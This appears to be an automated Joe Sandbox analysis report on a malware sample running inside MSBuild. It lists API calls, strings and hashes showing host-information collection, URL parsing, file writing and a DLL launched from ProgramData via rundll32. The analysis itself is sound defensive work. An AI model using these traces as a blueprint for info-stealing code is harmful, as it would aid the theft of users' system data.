RegCloseKey.ADVAPI32(?), ref: 00415736
lstrcatA.KERNEL32(?,?), ref: 00415765
lstrcatA.KERNEL32(?), ref: 00415778

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue_memset
String ID:
API String ID: 3891774339-0
Opcode ID: ac1fb4f045a9c32dacb6dad2a78e6ac069a90479201ba3abe6436e5ac879c97b
Instruction ID: e3ba0b7b5b2fb8b2565dba4b64b39c9cbbaa1b19ed1f7e4edb880feb37e2cc77
Opcode Fuzzy Hash: ac1fb4f045a9c32dacb6dad2a78e6ac069a90479201ba3abe6436e5ac879c97b
Instruction Fuzzy Hash: A4419F7194011D9FDF25EF60EC86EE9777ABB08309F0004AAA509A31A1DE759FC5CF94

Function 0041172C Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00411733
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B00C,?,00000018,004118D6,?), ref: 00411756
SysAllocString.OLEAUT32(?), ref: 00411763
_wtoi64.MSVCRT ref: 00411796
SysFreeString.OLEAUT32(?), ref: 004117AF
SysFreeString.OLEAUT32(00000000), ref: 004117B6

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: fd88fb5497638aeef0a14a928d7dd4e9b88d528f9d840e34107f64def9e00234
Instruction ID: 961552eb479836ccdab8e971d66b677841601f0c78c6f1686972c690af5acfd4
Opcode Fuzzy Hash: fd88fb5497638aeef0a14a928d7dd4e9b88d528f9d840e34107f64def9e00234
Instruction Fuzzy Hash: 20113A7490020ADFCB009FA4D8989EEBBB5AF49310F54417EF215E73A0DB394945CB68

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00418658), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 0293bc6baf19ea88f5dcdac6dc36adae0a2fd482d30136ec37c6ad156b83eb7b
Instruction ID: 27ef599a1d12bfc6fab42a15079cef7b1cf4f0a6bc86b08c005583bc8864efc5
Opcode Fuzzy Hash: 0293bc6baf19ea88f5dcdac6dc36adae0a2fd482d30136ec37c6ad156b83eb7b
Instruction Fuzzy Hash: A7F0C87278121077F22416753C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C

Function 004129A2 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

ShellExecuteEx.SHELL32(?), ref: 00412BC4

Strings

.dll, xrefs: 00412A2D
"" , xrefs: 00412A72
C:\Windows\system32\rundll32.exe, xrefs: 00412B23
C:\ProgramData\, xrefs: 004129D5

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: 6252ec6ac49dfec6d2eafc2302cecde9fc2a765bfa1e9cc05a02df74186979af
Instruction ID: 7fa8ef2f9362575d2c98cd0ef48d00ba90e4e67445d6038ce57a6efc2446493c
Opcode Fuzzy Hash: 6252ec6ac49dfec6d2eafc2302cecde9fc2a765bfa1e9cc05a02df74186979af
Instruction Fuzzy Hash: C771CA71D00119ABCF10FFA5D9466CDB7B4AF04748F11406AB510B7192DBB8AE8A8F88

Function 00411659 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116A3

Part of subcall function 004123AA: malloc.MSVCRT ref: 004123AF
Part of subcall function 004123AA: strncpy.MSVCRT ref: 004123C0

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116CB
lstrcatA.KERNEL32(?,00436ED4,?,?,?,?,?), ref: 004116E8
GetCurrentHwProfileA.ADVAPI32(?), ref: 00411674

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Strings

Unknown, xrefs: 00411711

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: a8f65e7d9cec54b388c0f37e87b197d2f03a81ccec6cadffe457aad5dbb4e0d3
Instruction ID: 9adf647b1b32870da9e3491b8df7208255a96cb22296bfccf9f875d0222035d8
Opcode Fuzzy Hash: a8f65e7d9cec54b388c0f37e87b197d2f03a81ccec6cadffe457aad5dbb4e0d3
Instruction Fuzzy Hash: EA113671A0021CABDB11EB65DC85BDD73B8AB08704F4004AAB645F7191DA789EC98B5C

Function 004110EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436918,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC,Install Date: ), ref: 00411106
HeapAlloc.KERNEL32(00000000), ref: 0041110D
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411129
wsprintfA.USER32 ref: 0041114F

Strings

%d MB, xrefs: 00411149

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: e9128c22f988c2f38e48ecffa092aa2b7f4cb2fe2a9676a632e9150ebbfc8512
Instruction ID: e424564083aa9ef612a57656847a91748b037a24208db361ee0b36f9d1d93f5f
Opcode Fuzzy Hash: e9128c22f988c2f38e48ecffa092aa2b7f4cb2fe2a9676a632e9150ebbfc8512
Instruction Fuzzy Hash: F401AEB1E00318BBEB04DFB4DC45AEEB7B8EF08705F44006AF605D7190DA759D818764

Function 0041BDB2 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,763374F0,?,0041CD7F,?,0041CE0D,00000000,06400000,00000003,00000000,0041770B,.exe,00436C64), ref: 0041BDFF
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,763374F0,?,0041CD7F,?,0041CE0D,00000000,06400000,00000003,00000000), ref: 0041BE37

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: 8330cc3da75d2d2f7eceea45b1f5dc24fae8a8e06cff23be40390e957423a823
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: A43165B0504B059FDB319F25C8847E77AE8EB14359F108A2FE39686781D33898C48B99

Function 6C9EC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C9EC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C9EC969
GetSystemInfo.KERNEL32(?), ref: 6C9EC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C9EC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C9EC9E2

Memory Dump Source

Source File: 00000002.00000002.2562751473.000000006C9D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000002.00000002.2562669428.000000006C9D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2563025623.000000006CA4D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2563101852.000000006CA5E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2563152283.000000006CA62000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c9d0000_MSBuild.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: add92593aaef80dc96d68ed83e491aa7617272a7bab11dbba9d4106e48d929cd
Instruction ID: 7fafb56ceef672a210455fd0b224a68a840c1980407ed7b94088e901c11686e5
Opcode Fuzzy Hash: add92593aaef80dc96d68ed83e491aa7617272a7bab11dbba9d4106e48d929cd
Instruction Fuzzy Hash: 3621FB327413055BDB095A24EC84BAE7679AF4A348F90811DF943A7740E7309C4487A1

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: 98310aa1f434478e7fb8539daea0c8874a8af54bde3e2f4e3fe51e91d8b2aa84
Instruction ID: 606110043d28a64a3cf3047e57e5fece759b363c0f9d5b5b09730ac45ad85936
Opcode Fuzzy Hash: 98310aa1f434478e7fb8539daea0c8874a8af54bde3e2f4e3fe51e91d8b2aa84
Instruction Fuzzy Hash: 03015B32D00218ABCF049BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A018B94

Function 00410F26 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934), ref: 00410F3A
HeapAlloc.KERNEL32(00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F41
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ), ref: 00410F5F
RegQueryValueExA.KERNEL32(00436890,00000000,00000000,00000000,000000FF,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000), ref: 00410F7B
RegCloseKey.ADVAPI32(00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F84

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 267a369b0f9252e087d037b2a4430d55cc5b2cc9540841a28167b2b4da7fd567
Instruction ID: 9d2ba58619f1d31ec1eed97cb1b3f411898d7f1aad353569fe744808fca98e41
Opcode Fuzzy Hash: 267a369b0f9252e087d037b2a4430d55cc5b2cc9540841a28167b2b4da7fd567
Instruction Fuzzy Hash: 72F03075640304FFEF248B90DC0EFAA7A7EEB44B06F141155F701A51A0D7B29B509B20

Function 004083DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(0065EF20,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DADF), ref: 004083F7

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,00417300,004366BE,004366BB,?,?,?,?,0041871B), ref: 00410524
Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,00417300,004366BE,004366BB,?,?,?,?,0041871B), ref: 00410556

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

SetEnvironmentVariableA.KERNEL32(?,00437194,0065EF20,0043674E,?,?,?,?,?,?,?,?,0040DADF), ref: 0040844C
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DADF), ref: 00408460

Strings

e, xrefs: 004083EB

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: e
API String ID: 2929475105-726562168
Opcode ID: 6f235fc267ff3b3de8f7a4bef7c54b4f5737f4398d48d1da619f8f41ce8de796
Instruction ID: 971f7df55b3f2cb1637261c8732b296e969311353f2cdeab8d65dad1843968ae
Opcode Fuzzy Hash: 6f235fc267ff3b3de8f7a4bef7c54b4f5737f4398d48d1da619f8f41ce8de796
Instruction Fuzzy Hash: 9F316171900714ABCF26EF29ED0246D7BB6AF44706F10613BE440B32B1DB7A1A41CF89

Function 00416F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416F59
lstrlenA.KERNEL32(?,0000001C), ref: 00416F64
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416FE8

Strings

ERROR, xrefs: 00416FE0

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: d9d78c61d8d29c3c95c0ae36bda477344383ac38314295c27f483c80f171f672
Instruction ID: 8834f6a6963786612a12ac118786572eda76d1f60cfdab7b7a16af0db0fb4f11
Opcode Fuzzy Hash: d9d78c61d8d29c3c95c0ae36bda477344383ac38314295c27f483c80f171f672
Instruction Fuzzy Hash: 3F117F71A0060A9FCB50FF65E9425DDBB71BF04314B50413AE818E3591DB79EAE58BC8

Function 0041221F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,*>A,00000000,?), ref: 00412241
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041225C
CloseHandle.KERNEL32(00000000), ref: 00412263

Strings

*>A, xrefs: 00412232, 00412237

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: *>A
API String ID: 3183270410-2324000863
Opcode ID: 0af9f2c264d25b6490a429b164a009b7d6240c1555b3ca16007ce260d50d1719
Instruction ID: e83ee73a11f8c4b419624c0b97b256bc47d47253a66d85432d4a601052c41585
Opcode Fuzzy Hash: 0af9f2c264d25b6490a429b164a009b7d6240c1555b3ca16007ce260d50d1719
Instruction Fuzzy Hash: 5EF05475600208ABDB14EB69DC45FEE77BC9B44B05F00006AF645D7290DEB4DAC58B99

Function 0040B307 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
